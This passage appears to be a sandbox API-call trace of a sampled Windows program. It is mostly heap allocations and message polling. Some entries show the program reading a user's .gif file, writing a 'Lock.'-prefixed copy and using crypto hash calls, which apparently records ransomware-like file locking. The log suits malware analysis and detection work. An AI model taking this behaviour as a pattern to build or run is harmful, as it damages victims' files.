dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.641] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.641] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.642] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.642] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.642] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.642] CryptDestroyHash (hHash=0xaa57e0) returned 1 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.643] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/bXPQ0g368kO FpGH2kMH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bxpq0g368ko fpgh2kmh.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0195.644] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.644] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0195.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0195.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.646] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0195.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0195.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.bXPQ0g368kO FpGH2kMH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.bxpq0g368ko fpgh2kmh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0195.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0195.689] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0195.689] ReadFile (in: hFile=0x2ac, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0195.690] ReadFile (in: hFile=0x2ac, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x29d0, lpOverlapped=0x0) returned 1 [0195.691] ReadFile (in: hFile=0x2ac, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0195.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x129d0) returned 0x24c7a50 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x129d0) returned 0x24da428 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x129d0) returned 0x24c7a50 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0195.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0195.694] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.694] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0195.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0195.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x129d0) returned 0x24c7a50 [0195.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 